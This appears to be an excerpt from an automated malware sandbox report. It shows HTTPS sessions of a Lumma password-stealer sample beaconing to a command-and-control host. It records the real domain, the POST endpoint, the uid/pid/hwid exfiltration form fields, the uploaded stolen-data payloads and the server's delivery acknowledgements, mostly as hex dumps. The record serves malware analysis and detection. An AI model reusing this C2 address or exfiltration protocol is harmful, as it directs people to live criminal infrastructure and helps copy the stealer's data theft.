                                                                          2025-03-17 03:17:06 UTC12409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6f 77 6f 77 6f 6f 77 6f 6b 6b 33 6a 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77
                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @owowoowokk3j4</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.449721104.21.48.14437872C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-17 03:17:06 UTC265OUTPOST /sjASHya HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 41
                                                                          Host: caliberc.life
                                                                          2025-03-17 03:17:06 UTC41OUTData Raw: 75 69 64 3d 35 34 39 38 33 39 33 63 34 65 34 36 36 63 36 39 33 38 30 36 32 63 35 62 64 34 64 61 37 38 37 63 26 63 69 64 3d
                                                                          Data Ascii: uid=5498393c4e466c6938062c5bd4da787c&cid=
                                                                          2025-03-17 03:17:07 UTC776INHTTP/1.1 200 OK
                                                                          Date: Mon, 17 Mar 2025 03:17:07 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 14134
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=51fZmbdDDmOwyGUwUyRjx1xnZJSEatVQLSwNG3Njwyb8Eaq2puURVaVX0t%2Fws8AtbDF5L0kByg9G8p%2BhA2LTK2gJ2x3%2FWVVLLPmkTEvoRJLTa8xUD7lZQJnpWHT7JcrT"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 921955de390c436a-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1590&rtt_var=600&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2829&recv_bytes=942&delivery_rate=1836477&cwnd=169&unsent_bytes=0&cid=3a78ea5b3968a2f4&ts=766&x=0"
                                                                          2025-03-17 03:17:07 UTC593INData Raw: 97 6c a0 6d 31 ca a7 0d f4 7b b4 99 56 9c eb 49 40 e6 c5 49 0a da e8 6e 0d f9 c1 e3 12 6c 2e 00 e0 3d a4 a7 37 c9 80 d5 d8 3c b5 ca 45 b0 46 9f 20 be 1a 9a 23 35 54 09 b8 37 52 c4 da 0a 54 20 ed e2 a1 96 6e 00 f3 bf 45 4f af 48 cb 8a 51 66 b5 f7 42 bf 0a 48 d7 21 9d 14 83 4c 71 5f b7 8c 71 92 3b 7c 2c 3c 95 c9 e8 6c af 56 f7 45 23 43 ae 4e 33 f1 42 c5 95 73 63 65 e7 d7 22 0c 04 ad 2e c0 ae 38 5d cf fb a4 52 c8 b6 75 1f c8 f1 2c 4c 95 be 83 b8 a2 86 bf 07 e5 6a aa 2f 01 ca 83 16 04 38 1a ce 80 6c ac 20 63 fa b2 bb 32 41 7a df 79 37 11 a1 1a 0c f4 96 35 fc ae 2e 48 45 e4 27 15 7a 36 04 ec 6a fd e9 97 3d 20 50 22 97 39 b4 2e 91 50 b2 ce e9 6a 54 2d 6e 0e b2 74 f7 fe dd 1a 68 30 34 90 fd be 75 9f ae 87 e1 78 1a 85 41 a5 4a 8e 8b 53 e6 05 d6 e1 35 30 a2 6f 69
                                                                          Data Ascii: lm1{VI@Inl.=7<EF #5T7RT nEOHQfBH!Lq_q;|,<lVE#CN3Bsce".8]Ru,Lj/8l c2Azy75.HE'z6j= P"9.PjT-nth04uxAJS50oi
                                                                          2025-03-17 03:17:07 UTC1369INData Raw: b0 91 b8 24 e4 b3 7e 20 04 7d 65 d7 12 c0 c5 91 16 aa 23 c9 c2 7f 2d d6 f9 cb 68 6b 76 f6 55 af 78 c3 40 66 90 11 01 a8 86 cd ea c1 ee e7 8a 63 ab 5a 6c 36 60 85 17 8c da 43 42 b3 ac d7 47 af c9 dd 0b 0d 8a 57 8e 50 60 88 fd 83 57 0a 3a 7c 57 82 c3 4c d4 d6 fc ac a0 5b 68 6d fe c9 7e 13 50 b7 5f 54 17 3a 01 62 bb 19 5a 03 52 aa d4 58 51 8e 52 8e 67 72 b6 35 da 5a 64 db 63 b8 85 b5 39 30 56 d5 a8 1e c7 07 3b fe 99 0d ea 87 92 38 a9 26 96 87 30 ef 5a 76 d3 46 8d cf cf d4 36 48 d2 95 80 7b b9 9a 14 19 9a b5 90 8d d3 9f 3b 2e 98 e7 ca 65 f6 c0 13 85 fe 31 71 b2 84 08 ee fa df 42 c9 3b 05 fc 8e 2d f1 b3 88 ed 8e 4a f9 fb 49 78 cd 03 02 42 1a a9 c3 ff 95 19 63 9d 61 c8 22 1d fe 0a b6 14 26 42 94 2c c9 2a 9c 90 df fc 60 2e 1c 0e 4c c3 26 8e a8 8e 2c 0c e7 d3 77
                                                                          Data Ascii: $~ }e#-hkvUx@fcZl6`CBGWP`W:|WL[hm~P_T:bZRXQRgr5Zdc90V;8&0ZvF6H{;.e1qB;-JIxBca"&B,*`.L&,w
                                                                          2025-03-17 03:17:07 UTC1369INData Raw: 09 66 a1 73 67 21 63 cc 47 b6 94 1a 71 9a 46 b6 a1 72 d9 42 ec 21 b8 15 a2 66 74 1b c4 48 52 22 07 b4 e4 b8 9c ab c5 75 dc e7 ea c6 bc 8e 9e 4a 22 b0 4a 01 4d 9f 26 0a 26 d7 f3 e3 81 8c 0f ab 0c f6 e8 1d a6 4f e5 4b f3 f1 e1 01 0d 4b ea 7e 1e b6 43 7e c2 24 55 aa 34 12 2d a9 8a b0 73 1a a9 17 1e f5 26 6e c5 8e 03 11 67 2f b8 09 4f ba f2 6f f7 c8 76 db f0 8c c1 91 1d 39 53 f7 53 7e 11 ec 37 7c 39 9f 23 93 a3 df 00 d4 de 5c 64 da 83 97 bc 4d 28 db 40 77 06 26 84 5d 2c c5 ba a5 21 d6 83 8b df 6c ea ca 29 08 b7 9a 7f 94 7a 59 c5 1b bc 53 26 cb 6c 83 45 71 64 9e fc f9 35 46 a2 df a5 f5 c2 f1 ca cd 2c fc 6b ed b7 f1 6c 0b 3c 59 f8 fc 17 9f 4e 1d 63 7c 4b 5a 12 2d 5f 3b 5b 0f b8 5f ed a2 2f cc 2c f9 9d 1f b1 c6 31 34 fc 41 9d 79 2d 45 c7 82 69 e4 e6 08 65 0b d1
                                                                          Data Ascii: fsg!cGqFrB!ftHR"uJ"JM&&OKK~C~$U4-s&ng/Oov9SS~7|9#\dM(@w&],!l)zYS&lEqd5F,kl<YNc|KZ-_;[_/,14Ay-Eie
                                                                          2025-03-17 03:17:07 UTC1369INData Raw: 5d ee 58 93 52 77 ed 46 ef b4 03 98 ec bc 2c 58 30 52 94 7f 51 4b ea 20 21 64 07 27 7f 8b de c3 c6 17 bb 55 00 3e 0e 29 6e ab 2b b1 03 fb 1a fa 71 f0 4e 30 eb 06 36 23 8e 58 42 b5 1c a6 dc 99 09 82 2c 5a 1b 3b 24 08 ca db 6f 04 a5 a7 a1 09 66 51 4b 64 7d c7 44 02 ec b3 c3 28 20 e1 2f 9a 36 35 d6 bc d8 3e c6 22 98 a2 6e 34 24 61 bf 8a e9 ce f1 ad 0b 66 36 64 3b b6 d9 59 a8 6d 4a b0 17 3c 6d 14 0a 55 34 b6 b0 cf 68 4b 8c fe 57 c7 29 76 e8 74 15 b4 9a dd da 0e ff 5d 86 8d df 5b 80 5f 32 a2 86 df ea 3c 5a b8 21 10 e3 b6 c7 23 8f 7d 8a eb bc 56 cc cd b7 05 13 ae 49 6d 57 b8 fe ff 73 a0 9c f0 f4 d5 1d 97 3a c7 2c 22 6a 34 13 e3 15 71 06 9f d3 1f de 49 2a fd ae 7f ab 49 7e cf a1 3a d6 dc 30 d8 45 88 49 4f e8 8b 80 90 12 e8 77 81 40 93 0c 15 91 20 6e 7a c7 83 51
                                                                          Data Ascii: ]XRwF,X0RQK !d'U>)n+qN06#XB,Z;$ofQKd}D( /65>"n4$af6d;YmJ<mU4hKW)vt][_2<Z!#}VImWs:,"j4qI*I~:0EIOw@ nzQ
                                                                          2025-03-17 03:17:07 UTC1369INData Raw: f4 13 68 c4 a7 b5 a7 a4 68 d2 78 88 bf d2 ee ed 11 0d 52 73 10 16 f4 1d 21 cb 83 a4 77 51 24 26 1d 49 f2 6f 76 1f 27 a1 fd c2 9d f8 dd df d6 70 8f f0 c8 46 4a db ac 0c 25 66 9f 29 e8 f6 c9 4b cd fc d6 f2 26 b5 ac 80 3e f7 4c 5d 4a 43 e6 84 9f 24 31 37 61 8e 91 01 5b 59 f6 95 7c 82 f8 08 23 40 28 5c ae 2d b9 93 98 fe d4 20 5d 8f 18 79 cc be 9c 7e 1e 82 c8 f8 a0 77 fb 23 bb ff 5b a4 71 21 ee ac c1 5e 60 8d ab 03 57 14 60 c8 93 96 0b 63 36 46 7a dc 0b 15 4d 2c b8 8d b4 ab 2e 0c d6 b4 46 23 45 55 24 0b a5 bb 4f 09 a4 7a 42 15 60 70 0b 69 d2 41 8a 8f 72 d1 8f 5c ca 27 65 9d 86 c8 b5 3f c2 e4 b5 d5 5e 68 dc 1f 08 43 e7 bb 11 b2 75 05 0e 76 c4 4a 98 f8 51 99 64 cf 86 11 2a 01 96 37 ef 96 0f 63 b4 b5 03 63 78 9b 51 81 32 ac bc cc ba 5e 6d 34 87 fa 8b e1 f6 d5 d0
                                                                          Data Ascii: hhxRs!wQ$&Iov'pFJ%f)K&>L]JC$17a[Y|#@(\- ]y~w#[q!^`W`c6FzM,.F#EU$OzB`piAr\'e?^hCuvJQd*7ccxQ2^m4
                                                                          2025-03-17 03:17:07 UTC1369INData Raw: 7b 4d 2d e2 6e 84 75 7f 60 7a 86 2e a5 dd cd a9 20 56 5e 17 97 de da 93 70 91 d4 54 23 09 66 51 db c3 03 11 ff e9 9e 57 5e 5d 5e 82 4a fa 55 01 03 a0 9a 0e 8f 47 69 94 ee bd a4 85 ae 57 6f db 59 14 71 26 e9 b6 7f d0 61 de 91 2e dc e4 24 64 5d 90 e3 26 48 2f 4a 24 23 0b 18 e5 26 c0 65 fa a7 3a 59 aa 85 42 ab 55 57 af da f1 8f a1 96 7d 54 ab 7c bd 8e 9b 8e c3 fd 76 32 f0 d0 81 42 d4 64 92 33 3b 37 a1 ec cf 6d 77 f5 74 e7 23 fc 81 01 b2 ba 79 e7 39 e2 5e ce 4c 24 33 84 89 6e a7 da 35 ed f9 9b 0a 0b 09 7e 1f 93 4c 17 8a 41 12 0d c3 03 36 e5 7f ab 72 2c c6 55 16 95 ac cc ca 29 34 3b e4 3b cc 41 13 cd 87 69 34 cd 53 00 06 da d9 ed 7a 2a f0 89 b4 64 3f 7d 51 8b c4 7f ed 8d 9b 8f 0c d4 03 d3 18 d5 e8 68 53 e1 00 06 87 18 31 63 95 c8 f0 b2 98 00 33 d7 81 74 d3 09
                                                                          Data Ascii: {M-nu`z. V^pT#fQW^]^JUGiWoYq&a.$d]&H/J$#&e:YBUW}T|v2Bd3;7mwt#y9^L$3n5~LA6r,U)4;;Ai4Sz*d?}QhS1c3t
                                                                          2025-03-17 03:17:07 UTC1369INData Raw: 5a dc 19 fb fd 64 f3 65 98 9f c0 66 c3 ff 5c 5a 7e 04 21 ae 32 55 67 e6 7e f8 91 00 90 3e 92 35 05 30 2e 9d 18 6a 5f 99 0a 03 d9 d8 71 81 a1 69 8a 8c 71 c5 c2 e4 6c e3 8c 67 b3 95 8d 2b ac 6a 42 9f cb aa 15 24 6c 98 ec dc c4 02 5c 05 c5 7f 34 f9 1b ba fa 6c c0 17 2a 94 36 cd 85 7f 29 59 39 e2 71 db eb a3 98 8b ec 86 0f 8f 5a 30 19 14 47 b5 73 e1 12 90 39 8c 94 be 29 24 d7 36 27 66 b5 8f c2 61 4e 02 cd f3 09 02 bb b6 e0 66 b4 8e ee 69 ef 21 1c 53 2d f8 ed 6d 91 f2 be 5f 0f 67 2b 62 23 85 52 63 a3 2e d7 76 ce 8b 65 1b de 9b 79 ab 13 ad 7e 93 0d c9 58 68 1d d5 0e 89 cd 15 21 0c ff 99 47 cd d7 e5 01 8a 5b f7 99 22 9e d7 2b 92 1f 0a f5 d8 18 22 ec 0f a2 96 44 f3 6f d6 a6 69 43 dd 6f b3 4e 9a fc de 8e ae 7d e2 1d 42 bb e4 1d 50 88 73 07 b0 ab dd 0a 07 94 2f 70
                                                                          Data Ascii: Zdef\Z~!2Ug~>50.j_qiqlg+jB$l\4l*6)Y9qZ0Gs9)$6'faNfi!S-m_g+b#Rc.vey~Xh!G["+"DoiCoN}BPs/p
                                                                          2025-03-17 03:17:07 UTC1369INData Raw: 2e 55 fd 52 e3 2a b5 fd 3b 49 b0 a1 31 ae c1 05 30 6f 2e 49 8d 6c a8 7d b5 96 e9 22 17 55 25 30 91 cc 93 bd da 7e b1 dc 43 ee d4 62 e4 ba 0a a7 44 c7 66 5a ae d9 9e 27 0c 17 68 5b ba d1 cc 76 6e 9d 72 23 07 ab b9 69 26 b1 c7 39 70 f9 2a 28 00 6b c6 dc 7a 3e e4 5b d2 8b 20 7b 27 62 12 9a a7 a9 a5 e4 e1 ee c9 4e ba df 8b af 89 66 fd 83 93 1a 88 24 66 23 9e 8a e8 7d 76 a0 25 ea f4 d6 f3 94 3a 56 c4 75 5d c5 31 5c 41 1d 3e 9f f5 3a 8b 9e 41 57 11 3d 4e 7c 05 8b 27 10 3d f7 82 27 8e 4f e5 2d 51 19 3b cc ab c5 17 f8 43 72 4c 15 2e 6b ea c5 e2 71 20 27 9c 6f fa a8 20 66 3d 16 92 6b 60 4b 06 94 96 fb 4a ab 53 3e d9 df 52 ee 5b a1 23 1d c1 ab d0 5f f7 c7 0d 33 3e cd fc 8a 9b 4d 4d 4b 02 2c 74 41 41 26 56 9f f7 13 02 86 93 94 d6 37 57 46 7c 71 89 70 b8 4e 1d f0 cf
                                                                          Data Ascii: .UR*;I10o.Il}"U%0~CbDfZ'h[vnr#i&9p*(kz>[ {'bNf$f#}v%:Vu]1\A>:AW=N|'='O-Q;CrL.kq 'o f=k`KJS>R[#_3>MMK,tAA&V7WF|qpN
                                                                          2025-03-17 03:17:07 UTC1369INData Raw: 5b 7f 84 67 6b 74 aa 3a 55 41 72 0a bf 0e 3c 01 a3 a4 e9 e2 88 b3 37 c0 0f 78 53 e2 5e 30 2e 34 7c 9f 2a 4d 54 e8 d2 c9 08 25 01 e9 2e 24 da c2 74 e3 d2 fe 55 0f d1 62 1d 84 ed d7 23 c7 8a ae 5e 9a ef c4 c4 e1 2a 89 48 2a a6 a4 fd c3 02 58 65 ce 69 a7 64 cf c8 90 85 a0 2e 1b 2b dd 6f 93 08 58 e1 c2 08 df 69 da f0 db 3d 3f 5e b4 56 2e b2 c1 95 d9 cc a2 0c a8 de 23 93 5d 18 00 a2 d4 10 98 75 4d 2e d1 3d 91 eb c3 f1 64 be 60 e6 33 de 89 10 b4 60 7e 45 db 34 63 e8 3e b1 dc 2f cb 9c 47 83 2a 51 e7 36 a6 bb 7e df 6d fa 59 b7 1d 58 f7 af d6 e2 69 19 2a fe b3 e1 a7 22 82 49 91 3a 2b 49 81 4d 04 fe d0 06 b1 f9 a6 d6 40 d2 00 d3 fe 34 01 0f e9 e9 db c2 b4 72 0c 48 14 b9 5b 4c 24 99 7a 22 d4 28 74 18 a1 8e b9 a0 a4 72 6f 56 4b 48 a6 32 b1 c8 34 d2 29 55 f6 87 50 d7
                                                                          Data Ascii: [gkt:UAr<7xS^0.4|*MT%.$tUb#^*H*Xeid.+oXi=?^V.#]uM.=d`3`~E4c>/G*Q6~mYXi*"I:+IM@4rH[L$z"(troVKH24)UP


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.449722104.21.48.14437872C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-17 03:17:08 UTC284OUTPOST /sjASHya HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=h6U0YO6OsONUuaTVw89
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 19616
                                                                          Host: caliberc.life
                                                                          2025-03-17 03:17:08 UTC15331OUTData Raw: 2d 2d 68 36 55 30 59 4f 36 4f 73 4f 4e 55 75 61 54 56 77 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 35 34 39 38 33 39 33 63 34 65 34 36 36 63 36 39 33 38 30 36 32 63 35 62 64 34 64 61 37 38 37 63 0d 0a 2d 2d 68 36 55 30 59 4f 36 4f 73 4f 4e 55 75 61 54 56 77 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 68 36 55 30 59 4f 36 4f 73 4f 4e 55 75 61 54 56 77 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 38 37 46 32 38 43 46 33
                                                                          Data Ascii: --h6U0YO6OsONUuaTVw89Content-Disposition: form-data; name="uid"5498393c4e466c6938062c5bd4da787c--h6U0YO6OsONUuaTVw89Content-Disposition: form-data; name="pid"2--h6U0YO6OsONUuaTVw89Content-Disposition: form-data; name="hwid"C687F28CF3
                                                                          2025-03-17 03:17:08 UTC4285OUTData Raw: 1c a8 7b 09 c9 06 49 f0 af 62 e6 66 db dc d6 88 d7 d1 bd a3 c4 51 06 2c 2f 26 fa 6a d4 eb e2 97 bd 82 e5 48 af 7b df 19 bd b3 5b ea 7d 94 78 25 9a 4d e0 00 8f 32 55 f4 37 bc 94 0f 5f 97 56 6d de 6e e4 3b 2d d0 e0 c9 58 21 82 c0 80 38 e1 9f f1 26 f0 c1 38 5d 11 ee dd ee ea a7 c3 e0 80 68 e0 34 c7 fc 13 e7 f9 df 1d 00 1b 83 c2 8b db 2d b4 f3 1e 5b 92 d3 fa 9d 08 43 63 bd eb 28 85 fc c2 de 89 1b 1a 77 fe 2f 25 ac 34 d3 03 93 8d 27 d0 57 c9 dc 54 df 23 b3 72 1b 27 84 1b 2c 7d 9b 9f 80 ea 35 80 e8 ae 2e eb a1 46 e2 80 80 1b 33 80 d9 be 34 ce bb ce 2c 32 6d 07 a1 b6 5b 76 b3 77 a9 99 e0 0c 83 12 b3 0d 7e ce 58 b3 fb 72 e9 55 22 da 27 e5 44 13 4e d8 cf 52 40 77 bf 11 ab 54 fa 82 31 ec ed 67 f3 95 ca b8 aa 7a db 11 fe 68 f8 f6 28 6a f4 92 e0 4f b4 0a 4c 98 45 a4
                                                                          Data Ascii: {IbfQ,/&jH{[}x%M2U7_Vmn;-X!8&8]h4-[Cc(w/%4'WT#r',}5.F34,2m[vw~XrU"'DNR@wT1gzh(jOLE
                                                                          2025-03-17 03:17:09 UTC810INHTTP/1.1 200 OK
                                                                          Date: Mon, 17 Mar 2025 03:17:09 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OqDnx7NOvCWgrv%2B5PkfWl2OGSTV6KH9M1GOGeVqNsK8JvgK1%2FtE1GfFPdFsLxayxhksmA9QS1D%2FaNzjiLbuF0QPcNUdGeQ%2F5tTG3JlR6kcV75VVN0iXO7pVelWLswJaR"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 921955e8aaa942cc-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1696&rtt_var=643&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2829&recv_bytes=20580&delivery_rate=1693735&cwnd=198&unsent_bytes=0&cid=ee83749a55c52d33&ts=710&x=0"
                                                                          2025-03-17 03:17:09 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a
                                                                          Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
                                                                          2025-03-17 03:17:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.449723104.21.48.14437872C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-17 03:17:09 UTC273OUTPOST /sjASHya HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=4qieRAB3A
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8723
                                                                          Host: caliberc.life
                                                                          2025-03-17 03:17:09 UTC8723OUTData Raw: 2d 2d 34 71 69 65 52 41 42 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 35 34 39 38 33 39 33 63 34 65 34 36 36 63 36 39 33 38 30 36 32 63 35 62 64 34 64 61 37 38 37 63 0d 0a 2d 2d 34 71 69 65 52 41 42 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 71 69 65 52 41 42 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 38 37 46 32 38 43 46 33 31 38 39 41 35 43 46 41 39 38 30 34 39 31 30 39 39 43 45 30 37 36 0d 0a 2d 2d 34 71 69 65
                                                                          Data Ascii: --4qieRAB3AContent-Disposition: form-data; name="uid"5498393c4e466c6938062c5bd4da787c--4qieRAB3AContent-Disposition: form-data; name="pid"2--4qieRAB3AContent-Disposition: form-data; name="hwid"C687F28CF3189A5CFA980491099CE076--4qie
                                                                          2025-03-17 03:17:10 UTC808INHTTP/1.1 200 OK
                                                                          Date: Mon, 17 Mar 2025 03:17:10 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kg%2B2%2BnRsSnrSwmrSiUJZXlIXw7sNUyR5UGUdq%2B8jPkUUyVFuRg9P413nP6OljefAgZWEn6aQ03C7nxd2roNdPssbKenH0ukxKl8pxD4wRjdTV0%2FsyMN3XZBcwS45ucZn"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 921955f0b8ac7c84-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1792&rtt_var=687&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2829&recv_bytes=9654&delivery_rate=1576673&cwnd=232&unsent_bytes=0&cid=086ece6d674d1291&ts=460&x=0"
                                                                          2025-03-17 03:17:10 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a
                                                                          Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
                                                                          2025-03-17 03:17:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.449724104.21.48.14437872C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-17 03:17:10 UTC276OUTPOST /sjASHya HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=g37N8Qn4dI6
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 20386
                                                                          Host: caliberc.life
                                                                          2025-03-17 03:17:10 UTC15331OUTData Raw: 2d 2d 67 33 37 4e 38 51 6e 34 64 49 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 35 34 39 38 33 39 33 63 34 65 34 36 36 63 36 39 33 38 30 36 32 63 35 62 64 34 64 61 37 38 37 63 0d 0a 2d 2d 67 33 37 4e 38 51 6e 34 64 49 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 67 33 37 4e 38 51 6e 34 64 49 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 38 37 46 32 38 43 46 33 31 38 39 41 35 43 46 41 39 38 30 34 39 31 30 39 39 43 45 30 37 36 0d 0a
                                                                          Data Ascii: --g37N8Qn4dI6Content-Disposition: form-data; name="uid"5498393c4e466c6938062c5bd4da787c--g37N8Qn4dI6Content-Disposition: form-data; name="pid"3--g37N8Qn4dI6Content-Disposition: form-data; name="hwid"C687F28CF3189A5CFA980491099CE076
